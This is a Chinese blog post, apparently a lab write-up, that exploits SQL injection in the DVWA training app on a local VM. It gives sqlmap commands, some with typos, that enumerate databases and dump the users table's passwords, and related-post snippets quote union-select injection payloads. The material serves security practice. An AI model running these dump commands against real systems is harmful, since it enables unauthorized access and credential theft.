DVWA(靶机)-----sql注入简单利用笔记

最新推荐文章于 2024-04-10 20:19:15 发布
最新推荐文章于 2024-04-10 20:19:15 发布
阅读量373 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/102865930
版权

关于DVWA的介绍网上太多。

实验环境:

windows2003服务器(192.168.152.128)

DVWA源码包

攻击过程:

step1:打开浏览器,设代理 ,Burpsuite设代理 。

step2:抓包如图,保存为sql_low.txt。

网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/

step3:使用sqlmap命令进行注入攻击

命令:sqlmap -r sql_low.txt --level=5 --risk=3 --dbs

step4:成功得到所有数据库名

step5:查看当前数据库

命令:sqlmap -r sql_low.txt --level=5 risk=3 --current-db

step6:查看数据库的所有表

命令:sqlmap -sql_low.txt --level=5 --risk=3 -D dvwa --tables

step7:查看表中的数据

命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users --columns

step7:查看数据内容

命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users -C "password,user" --dump

结果:

Medium级别类似。

命令:sqlmap -r sql_medium.txt --leve=5 --risk=3 --dbs

high级别 查看是否具有注入点

命令:sqlmap -r sql_high.txt --level=5 --risk=3 -p id

 

02be55f
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入简单版思路总结 (基于DVWA系统)
qq_41497476的博客
05-17 433
对于有提示,丝毫不加过滤的表单注入顺序如下: 一.探测是否有诸如点 常用的简单php处理语句有三类: 1.select *from … where id=’$input_data’ 2.select *from … where id=$input_data 3. select *from … where id="$input_data" 对于这三种情况,需要输入三种数据进行探测 最常见的情况1,输...
渗透神器sqlmap的使用笔记
煜铭2011
04-14 8650
0x00前言 sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!! 下载地址:https://github.com/sqlmapproj...
一个遭受千百次攻击的良心学习靶机网站DVWA
hackerie的博客
09-15 9895
话不多说,DVWA (Dam Vulnerable Web Application),一个供安全人员学习练手的优秀网站。以后该博客会慢慢收集类似的学习网站。希望大家共同进步!分享、学习、共同进步!
【kali-Linux】DVWA搭建漏洞靶场_kali搭建dvwa靶场,2024年最新网络安全入门你值得拥有
最新发布
2401_84254406的博客
04-10 487
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
XVWA XSS
baynk的博客
04-02 291
0x00 XSS XSS前面学习了很多次了,分三类,反射型xss,存储型xss,Dom型xss,危害较大的是存储型xss,而Dom型则是利用前端完成的xss,可以形成反射型xss也可以形成存储型xss。 0x01 Cross Site Scripting (XSS) – Reflected 直接url中改就行了,看下源码。 <?php if (isset($_GET['item'...
Web漏洞_SQL注入DVWA1.9版本SQL injection/SQL injection(Blind)靶机实验)
BeatRex的博客
03-18 1731
一、SQL注入的原理 场景:当我们在网站要登陆的时候,需要输入用户名、密码。这个过程由后台的程序将输入的内容连接数据库进行查询进行查询如php程序等。以php为例,当我们输入信息后,php程序会定义变量保存用户输入的信息,然后连接数据库,通过SQL语句进行查询。如果数据库中的用户名密码和我们相匹配则登陆成功最后php程序再返回结果。 SQL注入的原理就是由于php程序对我们输入的内容没有做好过滤,...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
2020-12-06-DVWA之sql.md
01-24
dvwa之sql
DVWA-master.zip
11-16
DVWA-master.zip
shop靶机实践sql盲注获取后台管理员账号密码
过客璇璇的博客
03-15 3699
shop靶机盲注获取后台管理员账号密码 找到注入点。 注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485 首先分析一下为什么确定这是一个注入点: 一、 正常页面如下: 二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485...
靶机-凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版(改)
05-21
凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版!本人修改的版本去掉sql过滤!后台上传取消限制cer文件!内附安装说明!推荐环境windows server 2003 + iis6.0 + asp + sqlserver 2005 express ! include/conn.asp是数据库连接文件自行设置!在数据库中新建一个数据库(名字随意在conn.asp中也要相对修改),然后新建查询把网站目录下的news.sql里面的内容复制到查询里面执行(会提示错误但是是正常的忽略),在iis中设置网站默认页面为default.asp(不是index.asp),如果没有权限打开请给网站文件添加everyone用户加权限和iis用户加权限!还要不会你就去搬砖吧!另外不要下载之前的那个!代码没改好!
sqlmap的基本使用
a69843251的博客
03-27 373
Sqlmap的使用 1、扫描地址:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” 2、忽略选项:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch 3、提升扫描等级:Sqlmap -u “http://12...
(2020上半年第6天)小迪网络安全笔记(操作②)sql注入网站测试简单靶机网站搭建
u013630181的博客
06-16 480
我们代码采用的是:链接① 注意: 第一步:进入phpstudy根目录把php导入 其他菜单->网站根目录 也可以:D:\phpstudy_pro\WWW 第二步:这里推荐用notepad 新建test.php文件把代码复制进去(我这边用test做测试) (下面的代码是有错误的) <body> <?php $conn=@mysql_connect("localhost",'root','')or die("数据库连接失败!");; mysql_select_
DVWA靶场-常见漏洞原理以及防御
大博的博客
02-17 2725
本文章可做DVWA普及课件所用 暴力破解 low 查看代码可知,代码中并没有任何防护手段,没有防爆破措施,比如验证码或者是错误登录限制措施,仅仅是设置login参数是否存在。 存在暴力破解和SQL注入。 演示自行使用BP以及自带字典。 medium 比较代码看出,username和password参数都是经过一次mysql_real_escape_string函数转换。查阅手册可知 这个只是减...
DVWA系列(三)——使用Burpsuite进行反射型XSS(反射型跨站脚本攻击)
橘子女侠
05-05 3802
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; (3)JavaScript 与J...
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 3959
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
SQL注入实验——web靶机第一关
qq_41554179的博客
03-09 2954
测试交互方法(此靶机为get); 判断字符类型;(此靶机没报错,为字符型) 构造闭合(次靶机闭合为 ‘ ); 爆库名; http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+ 爆表名; http://192.168.96.133/sqli-labs-master/L...
DVWA------反射型XSS
Z_Grant的博客
08-25 955
文章目录一,XSS中常用的JS代码和HTML元素(1)普通使用(2) 获得cookie和重定向(3)引入脚本文件二,DVWA的学习(1)低级1.1 重定向1.2 获取cookie1.3 kali监听获取目标的cookie(2)中级2.1 绕过方法2.1.1 大写 script2.1.2 复写2.1.3 使用其他没有被过滤的标签(3)高级(4)impossible4.1 绕过方法三,php常用的过滤...
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值